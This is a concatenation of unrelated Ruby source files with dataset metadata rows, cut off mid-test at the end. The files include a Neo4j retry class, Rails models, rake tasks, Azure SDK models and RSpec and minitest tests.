      # to the finally-raised error as suppressed exceptions.
      class ExponentialBackoffRetryLogic
        include Ext::ExceptionCheckable

        DEFAULT_MAX_RETRY_TIME = 30.seconds
        INITIAL_RETRY_DELAY = 1.second
        RETRY_DELAY_MULTIPLIER = 2.0
        RETRY_DELAY_JITTER_FACTOR = 0.2

        # @param max_retry_time [ActiveSupport::Duration, nil] total retry
        #   budget; defaults to DEFAULT_MAX_RETRY_TIME when nil
        # @param logger [Logger, nil] optional logger for retry warnings
        def initialize(max_retry_time = nil, logger = nil)
          @max_retry_time = max_retry_time || DEFAULT_MAX_RETRY_TIME
          @log = logger
        end

        # Executes the given block, retrying on retryable Neo4jExceptions.
        # Raises the last error (with earlier ones suppressed) once the
        # budget is spent or a non-retryable error occurs.
        def retry
          next_delay = INITIAL_RETRY_DELAY
          start_time = nil
          errors = nil
          begin
            check { yield }
          rescue Exceptions::Neo4jException => error
            if can_retry_on?(error)
              curr_time = current_time
              start_time ||= curr_time
              elapsed_time = curr_time - start_time
              if elapsed_time < @max_retry_time
                delay_with_jitter = compute_delay_with_jitter(next_delay)
                # BUG FIX: the delay is measured in seconds (the base delays
                # are built from `1.second`), but the old message printed the
                # raw value with an "ms" label. Convert before reporting.
                @log&.warn { "Transaction failed and will be retried in #{(delay_with_jitter * 1000).round}ms\n#{error}" }
                sleep(delay_with_jitter)
                next_delay *= RETRY_DELAY_MULTIPLIER
                (errors ||= []) << error
                retry
              end
            end
            # Budget exhausted or error not retryable: surface it, carrying
            # the earlier attempts' failures as suppressed exceptions.
            add_suppressed(error, errors)
            raise error
          end
        end

        private

        # An error is retryable when the driver can expect a new attempt to
        # succeed: expired sessions, unavailable servers, transient errors.
        def can_retry_on?(error)
          error.is_a?(Exceptions::SessionExpiredException) ||
            error.is_a?(Exceptions::ServiceUnavailableException) ||
            transient_error?(error)
        end

        def transient_error?(error)
          # Retries should not happen when transaction was explicitly terminated by the user.
          # Termination of transaction might result in two different error codes depending on where it was
          # terminated. These are really client errors but classification on the server is not entirely correct and
          # they are classified as transient.
          error.is_a?(Exceptions::TransientException) &&
            !%w[Neo.TransientError.Transaction.Terminated Neo.TransientError.Transaction.LockClientStopped]
              .include?(error.code)
        end

        # Returns a delay uniformly drawn from ±RETRY_DELAY_JITTER_FACTOR
        # around the nominal delay, so concurrent clients don't retry in
        # lockstep.
        def compute_delay_with_jitter(delay)
          jitter = delay * RETRY_DELAY_JITTER_FACTOR
          min = delay - jitter
          max = delay + jitter
          @rand ||= Random.new
          @rand.rand(min..max)
        end

        # Monotonic clock so elapsed time is immune to wall-clock jumps.
        def current_time
          Process.clock_gettime(Process::CLOCK_MONOTONIC)
        end

        # Attaches every previous failure to the finally-raised error,
        # skipping the error object itself.
        def add_suppressed(error, suppressed_errors)
          suppressed_errors&.reject(&error.method(:equal?))&.each(&error.method(:add_suppressed))
        end
      end
    end
  end
end
| 33.925926 | 115 | 0.60917 |
aba33840ac6516a373da76fa7318de1486db134d | 6,153 | # == Schema Information
#
# Table name: current_route_stop_patterns
#
# id :integer not null, primary key
# onestop_id :string
# geometry :geography({:srid geometry, 4326
# tags :hstore
# stop_pattern :string default([]), is an Array
# version :integer
# created_at :datetime not null
# updated_at :datetime not null
# created_or_updated_in_changeset_id :integer
# route_id :integer
# stop_distances :float default([]), is an Array
# edited_attributes :string default([]), is an Array
# geometry_source :string
#
# Indexes
#
# c_rsp_cu_in_changeset (created_or_updated_in_changeset_id)
# index_current_route_stop_patterns_on_onestop_id (onestop_id) UNIQUE
# index_current_route_stop_patterns_on_route_id (route_id)
# index_current_route_stop_patterns_on_stop_pattern (stop_pattern) USING gin
#
# Abstract base shared by the current and old (versioned) route stop pattern
# models; concrete subclasses pick their own table.
class BaseRouteStopPattern < ActiveRecord::Base
  self.abstract_class = true
  # Virtual (non-persisted) attributes populated from changeset payloads.
  attr_accessor :traversed_by
  attr_accessor :serves
end
# Current (live) route stop pattern: an ordered list of stops plus the
# geometry a route traverses between them.
class RouteStopPattern < BaseRouteStopPattern
  self.table_name_prefix = 'current_'
  # Decimal places kept when rounding geometry coordinates.
  COORDINATE_PRECISION = 5
  # GTFS
  # BUG FIX: pass the association class name as a string, as Rails documents;
  # passing the constant itself forces eager resolution and is deprecated.
  has_many :gtfs_entities, class_name: 'GTFSTrip', foreign_key: :entity_id
  belongs_to :route
  has_many :schedule_stop_pairs
  validates :geometry, :stop_pattern, presence: true
  # BUG FIX: the context must be the symbol :create. The original
  # `on: create` called the class-level ActiveRecord `create` method at
  # load time instead of scoping the validation to the create context.
  validates :onestop_id, uniqueness: true, on: :create
  validate :has_at_least_two_stops,
    :geometry_has_at_least_two_coords,
    :correct_stop_distances_length
  extend Enumerize
  enumerize :geometry_source, in: [:trip_stop_points, :shapes_txt, :shapes_txt_with_dist_traveled, :user_edited]
  # Validation: a pattern is meaningless with fewer than two stops.
  def has_at_least_two_stops
    if stop_pattern.length < 2
      errors.add(:stop_pattern, 'RouteStopPattern needs at least 2 stops')
    end
  end
  # Validation: the line geometry needs at least two coordinates.
  def geometry_has_at_least_two_coords
    if geometry.nil? || self[:geometry].num_points < 2
      errors.add(:geometry, 'RouteStopPattern needs a geometry with least 2 coordinates')
    end
  end
  # Validation: one cumulative distance per stop in the pattern.
  def correct_stop_distances_length
    if stop_pattern.size != stop_distances.size
      errors.add(:stop_distances, 'RouteStopPattern stop_distances size must equal stop_pattern size')
    end
  end
  include HasAOnestopId
  include HasAGeographicGeometry
  include HasTags
  include UpdatedSince
  include IsAnEntityImportedFromFeeds
  include IsAnEntityWithIssues
  # Tracked by changeset
  include CurrentTrackedByChangeset
  current_tracked_by_changeset({
    kind_of_model_tracked: :onestop_entity,
    virtual_attributes: [
      :traversed_by,
      :add_imported_from_feeds,
      :not_imported_from_feeds
    ],
    protected_attributes: [],
    sticky_attributes: [
      :geometry
    ]
  })
  # Resolves the virtual traversed_by Onestop ID to a concrete route row,
  # then lets the changeset machinery update feed associations.
  def update_associations(changeset)
    if self.traversed_by
      route = Route.find_by_onestop_id!(self.traversed_by)
      self.update_columns(route_id: route.id)
    end
    update_entity_imported_from_feeds(changeset)
    super(changeset)
  end
  # borrowed from schedule_stop_pair.rb
  # Returns the record for attrs[:id] when present; nil otherwise.
  def self.find_by_attributes(attrs = {})
    if attrs[:id].present?
      find(attrs[:id])
    end
  end
  scope :with_trips, -> (search_string) { where_imported_with_gtfs_id(search_string) }
  scope :with_all_stops, -> (search_string) { where{stop_pattern.within(search_string)} }
  scope :with_any_stops, -> (stop_onestop_ids) { where( "stop_pattern && ARRAY[?]::varchar[]", stop_onestop_ids ) }
  # Distinct GTFS trip ids this pattern was imported from.
  def trips
    entities_imported_from_feed.map(&:gtfs_id).uniq.compact
  end
  # Yields this pattern's schedule stop pairs grouped into per-trip chunks,
  # ordered by trip and departure time. No-op without a block.
  def ordered_ssp_trip_chunks(&block)
    if block
      ScheduleStopPair.where(route_stop_pattern: self).order(:trip, :origin_departure_time).slice_when { |s1, s2|
        !s1.trip.eql?(s2.trip)
      }.each {|trip_chunk| yield trip_chunk }
    end
  end
  ##### FromGTFS ####
  # Derives this pattern's Onestop ID from its route, stop pattern and
  # geometry (virtual attributes win over persisted ones when present).
  def generate_onestop_id
    route = self.traversed_by.present? ? self.traversed_by : self.route
    stop_pattern = self.serves.present? ? self.serves.map(&:onestop_id) : self.stop_pattern
    # NOTE(review): raising bare Exception is unusual; kept because callers
    # may rescue it specifically.
    fail Exception.new('route required') unless route
    fail Exception.new('stop_pattern required') unless stop_pattern
    fail Exception.new('geometry required') unless self.geometry
    onestop_id = OnestopId.handler_by_model(RouteStopPattern).new(
      route_onestop_id: route.onestop_id,
      stop_pattern: stop_pattern,
      geometry_coords: self.geometry[:coordinates]
    )
    onestop_id.to_s
  end
  # Builds an unsaved RouteStopPattern from GTFS inputs, preferring
  # shapes.txt geometry over raw trip stop points when available.
  def self.create_from_gtfs(trip, route_onestop_id, stop_pattern, stop_times, trip_stop_points, shape_points)
    # both trip_stop_points and stop_pattern correspond to stop_times.
    # GTFSGraph should already filter out stop_times of size 0 or 1 (using filter_empty).
    # We can still have one unique stop, but must have at least 2 stop times.
    raise ArgumentError.new('Need at least two stops') if stop_pattern.length < 2
    # Rgeo produces nil if there is only one coordinate in the array
    rsp = RouteStopPattern.new(
      stop_pattern: stop_pattern,
    )
    if shape_points.present? && shape_points.size > 1
      rsp.geometry = Geometry::LineString.line_string(Geometry::Lib.set_precision(shape_points, COORDINATE_PRECISION))
      rsp.geometry_source = Geometry::GTFSShapeDistanceTraveled.validate_shape_dist_traveled(stop_times, shape_points.shape_dist_traveled) ? :shapes_txt_with_dist_traveled : :shapes_txt
    else
      rsp.geometry = Geometry::LineString.line_string(Geometry::Lib.set_precision(trip_stop_points, COORDINATE_PRECISION))
      rsp.geometry_source = :trip_stop_points
    end
    onestop_id = OnestopId.handler_by_model(RouteStopPattern).new(
      route_onestop_id: route_onestop_id,
      stop_pattern: rsp.stop_pattern,
      geometry_coords: rsp.geometry[:coordinates]
    )
    rsp.onestop_id = onestop_id.to_s
    rsp.tags ||= {}
    rsp
  end
end
# Historical (versioned) counterpart of RouteStopPattern, tracked by the
# old-changeset machinery.
class OldRouteStopPattern < BaseRouteStopPattern
  include OldTrackedByChangeset
  include HasAGeographicGeometry
end
| 35.982456 | 185 | 0.708435 |
6264aa1d1ebaa2bb41e998f8c945c55911ece6ed | 858 | # encoding: utf-8
require File.expand_path('../../../spec_helper.rb', __FILE__)
# Specs for the global Gzip compressor defaults: values set via .defaults
# should be readable on the configuration class and removable with
# .clear_defaults!. Uses the legacy RSpec `should` syntax.
describe Backup::Configuration::Compressor::Gzip do
  before do
    Backup::Configuration::Compressor::Gzip.defaults do |compressor|
      compressor.best = true
      compressor.fast = true
    end
  end
  # Reset shared global state so other examples see a clean slate.
  after { Backup::Configuration::Compressor::Gzip.clear_defaults! }
  it 'should set the default compressor configuration' do
    compressor = Backup::Configuration::Compressor::Gzip
    compressor.best.should == true
    compressor.fast.should == true
  end
  describe '#clear_defaults!' do
    it 'should clear all the defaults, resetting them to nil' do
      Backup::Configuration::Compressor::Gzip.clear_defaults!
      compressor = Backup::Configuration::Compressor::Gzip
      compressor.best.should == nil
      compressor.fast.should == nil
    end
  end
end
| 28.6 | 68 | 0.70979 |
f855a5723efd267d8d75b70861495e8d412128c6 | 581 | #!/usr/bin/env ruby -w
require 'rmagick'
# Demo of Magick::Draw#annotate: renders the word "RMagick" three times with
# small offsets to fake an embossed look on a granite-textured canvas.
Text = 'RMagick'
# 300x100 canvas filled with ImageMagick's built-in granite: texture.
granite = Magick::ImageList.new('granite:')
canvas = Magick::ImageList.new
canvas.new_image(300, 100, Magick::TextureFill.new(granite))
drawer = Magick::Draw.new
drawer.pointsize = 52
drawer.gravity = Magick::CenterGravity
# Highlight, shadow, then the main fill — drawn in this order so the
# dark-red text sits on top of the two offset layers.
[[2, 2, 'gray83'], [-1.5, -1.5, 'gray40'], [0, 0, 'darkred']].each do |dx, dy, color|
  drawer.annotate(canvas, 0, 0, dx, dy, Text) do
    self.fill = color
  end
end
#canvas.display
canvas.write('rubyname.gif')
exit
| 18.741935 | 60 | 0.70568 |
11758c7be601cc677d39bd7f4ebd7ecfeb835a99 | 1,415 | require "test/unit"
# Exercises the private BST helper: insertion via #add_all and lookup via
# #get, including the empty-tree and missing-key cases.
class BSTTest < Test::Unit::TestCase
  def test_bst
    assert_equal(nil, BST.new.get("a"))
    assert_equal(1, BST.new.add_all({"a" => 1, "b" => 2}).get("a"))
    bst = BST.new.add_all({"a" => 1, "b" => 2, "c" => 3})
    assert_equal(1, bst.get("a"))
    assert_equal(2, bst.get("b"))
    assert_equal(3, bst.get("c"))
    assert_equal(nil, bst.get("d"))
  end

  private

  # Minimal unbalanced binary search tree mapping keys to values.
  class BST
    # Inserts every key/value pair from +entries+; returns self for chaining.
    def add_all(entries)
      entries.each { |key, value| @root = do_add(key, value, @root) }
      self
    end

    # Returns the value stored under +key+, or nil when absent.
    def get(key)
      do_get(key, @root)
    end

    private

    def do_get(key, node)
      return nil if node.nil?
      if key == node.key
        node.value
      elsif key > node.key
        do_get(key, node.right)
      else
        do_get(key, node.left)
      end
    end

    def do_add(key, value, node)
      return Node.new(key, value) if node.nil?
      if key > node.key
        node.right = do_add(key, value, node.right)
      else
        node.left = do_add(key, value, node.left)
      end
      node
    end
  end

  # Plain tree node; keys <= the node's key go into the left subtree.
  Node = Struct.new(:key, :value, :left, :right)
end
| 20.214286 | 69 | 0.542756 |
e85c97ad16e638cfe017b063d40bcda06c8ea3cc | 426 | Rails.application.routes.draw do
resources :friendships, only: [:new, :create]
resources :messages
resources :sessions, only: [:new, :create]
resources :users
root 'home#index'
delete 'log_out' => 'sessions#destroy'
get 'all_friends' => 'users#all_friends'
delete 'unfriend' => 'friendships#destroy'
get 'sent_messages' => 'messages#sent_messages'
get 'auth/:provider/callback' => 'sessions#callback'
end
| 32.769231 | 54 | 0.713615 |
1ddf7e7fe330603bb1c40f86e7c33822349a529e | 4,349 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Consumption::Mgmt::V2019_06_01
  module Models
    #
    # The notification associated with a budget.
    #
    # NOTE: AutoRest-generated model (see file header) — hand edits will be
    # lost on regeneration. The mapper below drives MsRest JSON
    # (de)serialization, including required-field and size constraints.
    class Notification

      include MsRestAzure

      # @return [Boolean] The notification is enabled or not.
      attr_accessor :enabled

      # @return [OperatorType] The comparison operator. Possible values
      # include: 'EqualTo', 'GreaterThan', 'GreaterThanOrEqualTo'
      attr_accessor :operator

      # @return Threshold value associated with a notification. Notification is
      # sent when the cost exceeded the threshold. It is always percent and has
      # to be between 0 and 1000.
      attr_accessor :threshold

      # @return [Array<String>] Email addresses to send the budget notification
      # to when the threshold is exceeded.
      attr_accessor :contact_emails

      # @return [Array<String>] Contact roles to send the budget notification
      # to when the threshold is exceeded.
      attr_accessor :contact_roles

      # @return [Array<String>] Action groups to send the budget notification
      # to when the threshold is exceeded.
      attr_accessor :contact_groups


      #
      # Mapper for Notification class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'Notification',
          type: {
            name: 'Composite',
            class_name: 'Notification',
            model_properties: {
              enabled: {
                client_side_validation: true,
                required: true,
                serialized_name: 'enabled',
                type: {
                  name: 'Boolean'
                }
              },
              operator: {
                client_side_validation: true,
                required: true,
                serialized_name: 'operator',
                type: {
                  name: 'String'
                }
              },
              threshold: {
                client_side_validation: true,
                required: true,
                serialized_name: 'threshold',
                type: {
                  name: 'Number'
                }
              },
              contact_emails: {
                client_side_validation: true,
                required: true,
                serialized_name: 'contactEmails',
                constraints: {
                  MaxItems: 50,
                  MinItems: 1
                },
                type: {
                  name: 'Sequence',
                  element: {
                      client_side_validation: true,
                      required: false,
                      serialized_name: 'StringElementType',
                      type: {
                        name: 'String'
                      }
                  }
                }
              },
              contact_roles: {
                client_side_validation: true,
                required: false,
                serialized_name: 'contactRoles',
                type: {
                  name: 'Sequence',
                  element: {
                      client_side_validation: true,
                      required: false,
                      serialized_name: 'StringElementType',
                      type: {
                        name: 'String'
                      }
                  }
                }
              },
              contact_groups: {
                client_side_validation: true,
                required: false,
                serialized_name: 'contactGroups',
                constraints: {
                  MaxItems: 50,
                  MinItems: 0
                },
                type: {
                  name: 'Sequence',
                  element: {
                      client_side_validation: true,
                      required: false,
                      serialized_name: 'StringElementType',
                      type: {
                        name: 'String'
                      }
                  }
                }
              }
            }
          }
        }
      end
    end
  end
end
| 31.064286 | 79 | 0.464705 |
ac61ded99ac9a63ab85a1a31a8ba9c4f04519ac2 | 2,380 | namespace :data_requests do
  # UUIDS=123abc,456def rake data_requests:lookup_users_by_device
  desc 'Recursively lookup users using a network of shared devices'
  task lookup_users_by_device: :environment do
    # Disable the Postgres statement timeout: the shared-device traversal
    # can run for a long time on large datasets.
    ActiveRecord::Base.connection.execute('SET statement_timeout = 0')
    uuids = ENV.fetch('UUIDS', '').split(',')
    # compact drops UUIDs that do not resolve to a known user.
    users = uuids.map { |uuid| DataRequests::LookupUserByUuid.new(uuid).call }.compact
    result = DataRequests::LookupSharedDeviceUsers.new(users).call
    puts JSON.pretty_generate(result)
    # Emit the flattened UUID list in a form that can be fed back into
    # the other tasks' UUIDS env var.
    puts "UUIDS: #{result.values.flatten.uniq.join(',')}"
  end
  # UUIDS=123abc,456def REQUESTING_ISSUER=sample:app:issuer rake data_requests:create_users_report
  desc 'Create a JSON report with data for the specified users'
  task create_users_report: :environment do
    uuids = ENV.fetch('UUIDS', '').split(',')
    requesting_issuers = ENV.fetch('REQUESTING_ISSUER', nil)&.split(',')
    output = uuids.map do |uuid|
      user = DataRequests::LookupUserByUuid.new(uuid).call
      # Unknown UUIDs are reported on stderr and skipped (compact below).
      next warn("No record for uuid #{uuid}") if user.nil?
      DataRequests::CreateUserReport.new(user, requesting_issuers).call
    end.compact.to_json
    puts output
  end
  # export USERS_REPORT=/tmp/query-2020-11-17/user_report.json
  # export OUTPUT_DIR=/tmp/query-2020-11-17/results/
  # rake data_requests:process_users_report
  desc 'Take a JSON user report, download logs from cloud watch, and write user data'
  task process_users_report: :environment do
    users_report = JSON.parse(File.read(ENV['USERS_REPORT']), symbolize_names: true)
    output_dir = ENV['OUTPUT_DIR']
    users_report.each do |user_report|
      puts "Processing user: #{user_report[:requesting_issuer_uuid]}"
      # One output subdirectory per user, keyed by the issuer-scoped UUID.
      user_output_dir = File.join(output_dir, user_report[:requesting_issuer_uuid])
      FileUtils.mkdir_p(user_output_dir)
      DataRequests::WriteUserInfo.new(user_report, user_output_dir).call
      DataRequests::WriteUserEvents.new(user_report, user_output_dir).call
      # Fetch CloudWatch logs only for the distinct dates on which the user
      # actually had events.
      cloudwatch_dates = user_report[:user_events].map { |row| row[:date_time] }.map do |date_time|
        Time.zone.parse(date_time).to_date
      end.uniq
      cloudwatch_results = DataRequests::FetchCloudwatchLogs.new(
        user_report[:login_uuid],
        cloudwatch_dates,
      ).call
      DataRequests::WriteCloudwatchLogs.new(cloudwatch_results, user_output_dir).call
    end
  end
end
| 41.754386 | 99 | 0.735714 |
e86b09f156d95775cd21782ccd519d34bde27006 | 560 | # frozen_string_literal: true
require "spec_helper"
# Static-validation spec: feeds a fragment with no name/type condition
# through the validator and checks the reported error.
# NOTE(review): the example name says "non-existent types", but the asserted
# error is "Fragment definition has no name" — the description may be stale.
describe GraphQL::StaticValidation::FragmentTypesExist do
  include StaticValidationHelpers
  let(:query_string) {"
    fragment on Cheese {
      id
      flavor
    }
  "}

  it "finds non-existent types on fragments" do
    assert_equal(1, errors.length)
    fragment_def_error = {
      "message"=>"Fragment definition has no name",
      "locations"=>[{"line"=>2, "column"=>5}],
      "fields"=>["fragment "],
    }
    assert_includes(errors, fragment_def_error, "on fragment definitions")
  end
end
| 23.333333 | 74 | 0.673214 |
ffe6a79f68e0ef247fd36461c3a298daf19f678b | 224 | class CreateAccountBooks < ActiveRecord::Migration
def change
create_table :account_books do |t|
t.references :account
t.references :book
t.string :lean_pub_link
t.timestamps
end
end
end
| 18.666667 | 50 | 0.6875 |
1cccc3d7dd34ccd2b4ac0d40d44c5b872c2064a2 | 1,593 | require 'orm_adapter'
# Top-level namespace for the Ckeditor gem: registers autoloaded helpers,
# form-builder hooks and storage backends, and exposes module-wide
# configuration accessors.
module Ckeditor
  # MIME types treated as images by the uploader. Frozen because this is a
  # lookup table, not runtime-mutable configuration.
  IMAGE_TYPES = ['image/jpeg', 'image/png', 'image/gif', 'image/jpg', 'image/pjpeg', 'image/tiff', 'image/x-png'].freeze

  autoload :Utils, 'ckeditor/utils'
  autoload :Http, 'ckeditor/http'

  module Helpers
    autoload :ViewHelper, 'ckeditor/helpers/view_helper'
    autoload :FormHelper, 'ckeditor/helpers/form_helper'
    autoload :FormBuilder, 'ckeditor/helpers/form_builder'
    autoload :Controllers, 'ckeditor/helpers/controllers'
  end

  module Hooks
    autoload :FormtasticBuilder, 'ckeditor/hooks/formtastic'
    autoload :SimpleFormBuilder, 'ckeditor/hooks/simple_form'
  end

  module Backend
    autoload :Paperclip, 'ckeditor/backend/paperclip'
    autoload :CarrierWave, 'ckeditor/backend/carrierwave'
  end

  # Allowed image file types for upload.
  # Set to nil or [] (empty array) for all file types
  mattr_accessor :image_file_types
  @@image_file_types = ["jpg", "jpeg", "png", "gif", "tiff"]

  # Allowed attachment file types for upload.
  # Set to nil or [] (empty array) for all file types
  mattr_accessor :attachment_file_types
  @@attachment_file_types = ["doc", "docx", "xls", "odt", "ods", "pdf", "rar", "zip", "tar", "tar.gz", "swf"]

  # Default way to setup Ckeditor. Run rails generate ckeditor to create
  # a fresh initializer with all configuration values.
  def self.setup
    yield self
  end

  # ORM-agnostic adapter (via orm_adapter) for the picture model.
  def self.picture_model
    Ckeditor::Picture.to_adapter
  end

  # ORM-agnostic adapter (via orm_adapter) for the attachment model.
  def self.attachment_file_model
    Ckeditor::AttachmentFile.to_adapter
  end
end
require 'ckeditor/engine'
require 'ckeditor/version'
| 30.056604 | 113 | 0.711237 |
619a58cc77f81b8c6acd9dc371fffefb6d939b6f | 1,096 | cask 'filezilla' do
if MacOS.version <= :snow_leopard
version '3.8.1'
sha256 '86c725246e2190b04193ce8e7e5ea89d5b9318e9f20f5b6f9cdd45b6f5c2d283'
else
version '3.24.0'
sha256 '6f57b0c91d0f20d545cd854855d35dcb1b088bc9e2c73cfaca4984bda93df5a9'
end
# sourceforge.net/filezilla was verified as official when first introduced to the cask
url "https://downloads.sourceforge.net/filezilla/FileZilla_Client/#{version}/FileZilla_#{version}_macosx-x86.app.tar.bz2"
appcast 'https://sourceforge.net/projects/filezilla/rss?path=/FileZilla_Client',
checkpoint: '4b4bb69191e36ac2e2f36d306840e496435f345683d74bf348c9ef95ce818f3e'
name 'FileZilla'
homepage 'https://filezilla-project.org/'
app 'FileZilla.app'
zap delete: [
'~/.config/filezilla',
'~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/de.filezilla.sfl',
'~/Library/Saved Application State/de.filezilla.savedState',
'~/Library/Preferences/de.filezilla.plist',
]
end
| 42.153846 | 144 | 0.730839 |
1c0158d81ba29c254ba093b2870e184f49d4b966 | 1,080 | # == Schema Information
#
# Table name: visits
#
# id :integer not null, primary key
# visit_token :string
# visitor_token :string
# ip :string
# user_agent :text
# referrer :text
# landing_page :text
# user_id :integer
# referring_domain :string
# search_keyword :string
# browser :string
# os :string
# device_type :string
# screen_height :integer
# screen_width :integer
# country :string
# region :string
# city :string
# postal_code :string
# latitude :decimal(, )
# longitude :decimal(, )
# utm_source :string
# utm_medium :string
# utm_term :string
# utm_content :string
# utm_campaign :string
# started_at :datetime
#
# Indexes
#
# index_visits_on_user_id (user_id)
# index_visits_on_visit_token (visit_token) UNIQUE
#
# One tracked browsing session (Ahoy visit), carrying the device, geo and
# UTM-attribution columns listed in the schema annotation above.
class Visit < ApplicationRecord
  # Events recorded during this visit (Ahoy::Event rows).
  has_many :ahoy_events, class_name: "Ahoy::Event"
  # The signed-in user for this visit, if any; anonymous visits have none.
  belongs_to :user, optional: true
end
| 25.116279 | 59 | 0.587037 |
3375883e6ff7aaa76ba387f3d731add3dab2579c | 329 | module Ecm::Meta
module Generators
class GuardRspecGenerator < Rails::Generators::Base
desc 'Installs Guard Rspec'
def add_to_application_gemfile
append_file 'Gemfile.application', "\ngem 'guard-rspec', group: :development"
%x(bundle install)
%x(guard init)
end
end
end
end
| 23.5 | 85 | 0.662614 |
6a42379e7c641f9f36117d3bda34546559d60c83 | 2,071 | require 'loghouse_query/parsers'
require 'loghouse_query/storable'
require 'loghouse_query/pagination'
require 'loghouse_query/clickhouse'
require 'loghouse_query/permissions'
require 'loghouse_query/csv'
require 'log_entry'
require 'log'
# A single log query against the Loghouse ClickHouse backend.
#
# Core state lives in two hashes:
#   * +attributes+  - persisted columns (id, namespaces, order_by, ...)
#   * +time_params+ - the time window: either a 'seek_to' point or a
#                     'range' with from/to bounds.
#
# Most behavior (parsing, persistence, pagination, query execution,
# permissions, CSV export) is mixed in from the modules below.
class LoghouseQuery
  include Parsers
  include Storable
  include Pagination
  include Clickhouse
  include Permissions
  include CSV

  # Default time window; from/to only apply when format is 'range'.
  TIME_PARAMS_DEFAULTS = {
    format: 'seek_to',
    seek_to: 'now',
    from: 'now-15m',
    to: 'now'
  }.freeze

  attr_accessor :attributes, :time_params, :persisted
  # NOTE: the +time_params+ reader generated above is overridden below by a
  # combined getter/setter of the same name.

  # Builds a query from an attribute hash. Unknown keys are ignored; known
  # keys only override the column defaults when their value is present.
  def initialize(attrs = {})
    attrs.symbolize_keys!

    @attributes = self.class.columns.dup
    @attributes.each do |k, v|
      @attributes[k] = attrs[k] if attrs[k].present?
    end
    # Assign an id up front so even unsaved queries are addressable.
    @attributes[:id] ||= SecureRandom.uuid

    time_params({})
  end

  # Combined getter/setter:
  #   time_params        => returns the current time-params hash
  #   time_params(hash)  => merges present values over TIME_PARAMS_DEFAULTS,
  #                         trims keys to the chosen format, returns self
  #                         (allows chaining).
  def time_params(params=nil)
    return @time_params if params.nil?

    @time_params = TIME_PARAMS_DEFAULTS.dup
    params.each do |k, v|
      @time_params[k] = params[k] if params[k].present?
    end

    # Keep only the keys relevant to the selected format.
    case @time_params[:format]
    when 'seek_to'
      @time_params.slice!(:format, :seek_to)
    when 'range'
      @time_params.slice!(:format, :from, :to)
    end

    self
  end

  def id
    attributes[:id]
  end

  # Namespaces filter, always normalized to an array.
  def namespaces
    Array.wrap(attributes[:namespaces])
  end

  # ORDER BY clause: user-specified ordering first (when present), then a
  # stable newest-first tiebreak on timestamp and nanoseconds.
  def order_by
    [attributes[:order_by], "#{LogsTables::TIMESTAMP_ATTRIBUTE} DESC", "#{LogsTables::NSEC_ATTRIBUTE} DESC"].compact.join(', ')
  end

  def validate_query!
    parsed_query # sort of validation: will fail if format is not correct
  end

  # Validates whichever time fields the current format requires.
  def validate_time_params!
    if time_params[:format] == 'range'
      parsed_time_from # sort of validation: will fail if format is not correct
      parsed_time_to # sort of validation: will fail if format is not correct
    else
      parsed_seek_to # sort of validation: will fail if format is not correct
    end
  end

  # Full validation; individual checks can be skipped via
  # options[:query] == false / options[:time_params] == false.
  def validate!(options = {})
    super
    validate_query! unless options[:query] == false
    validate_time_params! unless options[:time_params] == false
  end
end
require 'log_entry'
| 23.534091 | 127 | 0.691453 |
79c87abc043ff23820658b51a14fff4457adf0f6 | 1,361 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::MediaServices::Mgmt::V2018_06_01_preview
  module Models
    #
    # Represents a ContentKeyPolicyRestriction that is unavailable in the
    # current API version.
    #
    class ContentKeyPolicyUnknownRestriction < ContentKeyPolicyRestriction

      include MsRestAzure


      def initialize
        # OData type discriminator used for polymorphic (de)serialization.
        @odatatype = "#Microsoft.Media.ContentKeyPolicyUnknownRestriction"
      end

      attr_accessor :odatatype


      #
      # Mapper for ContentKeyPolicyUnknownRestriction class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: '#Microsoft.Media.ContentKeyPolicyUnknownRestriction',
          type: {
            name: 'Composite',
            class_name: 'ContentKeyPolicyUnknownRestriction',
            model_properties: {
              odatatype: {
                client_side_validation: true,
                required: true,
                serialized_name: '@odata\\.type',
                type: {
                  name: 'String'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 26.686275 | 81 | 0.602498 |
03ab1e85413d55e16c2ecdabe9f4dbe486bd6952 | 33,370 | require 'test_helper'
module Pd::Application
class Teacher1819ApplicationTest < ActiveSupport::TestCase
include Pd::Teacher1819ApplicationConstants
include ApplicationConstants
include RegionalPartnerTeacherconMapping
freeze_time
# A guid is absent on an unsaved application and assigned on first save.
test 'application guid is generated on create' do
  application = build :pd_teacher1819_application
  assert_nil application.application_guid

  application.save!
  assert_not_nil application.application_guid
end
test 'existing guid is preserved' do
  guid = SecureRandom.uuid
  application = create :pd_teacher1819_application, application_guid: guid
  assert_equal guid, application.application_guid

  # Re-saving must not regenerate an already-assigned guid.
  application.save!
  assert_equal guid, application.application_guid
end
test 'principal_approval_url' do
teacher_application = build :pd_teacher1819_application
assert_nil teacher_application.principal_approval_url
# save to generate guid and therefore principal approval url
teacher_application.save!
assert teacher_application.principal_approval_url
end
test 'principal_greeting' do
  with_title = build :pd_teacher1819_application,
    form_data_hash: build(:pd_teacher1819_application_hash)
  without_title = build :pd_teacher1819_application,
    form_data_hash: build(:pd_teacher1819_application_hash, principal_title: nil)

  # Title present => formal greeting; otherwise fall back to the full name.
  assert_equal 'Dr. Dumbledore', with_title.principal_greeting
  assert_equal 'Albus Dumbledore', without_title.principal_greeting
end
test 'meets criteria says an application meets critera when all YES_NO fields are marked yes' do
  {
    'csp' => CRITERIA_SCORE_QUESTIONS_CSP,
    'csd' => CRITERIA_SCORE_QUESTIONS_CSD
  }.each do |course, questions|
    # Score every criteria question 'Yes' for this course.
    all_yes = questions.map {|question| [question, 'Yes']}.to_h.to_json
    application = build :pd_teacher1819_application, course: course, response_scores: all_yes
    assert_equal 'Yes', application.meets_criteria
  end
end
test 'meets criteria says an application does not meet criteria when any YES_NO fields are marked NO' do
  # A single 'No' on a criteria question fails the whole application.
  application = build :pd_teacher1819_application,
    response_scores: {committed: 'No'}.to_json
  assert_equal 'No', application.meets_criteria
end
test 'meets criteria returns incomplete when an application does not have YES on all YES_NO fields but has no NOs' do
  # Only one question scored: not failing, but not fully reviewed either.
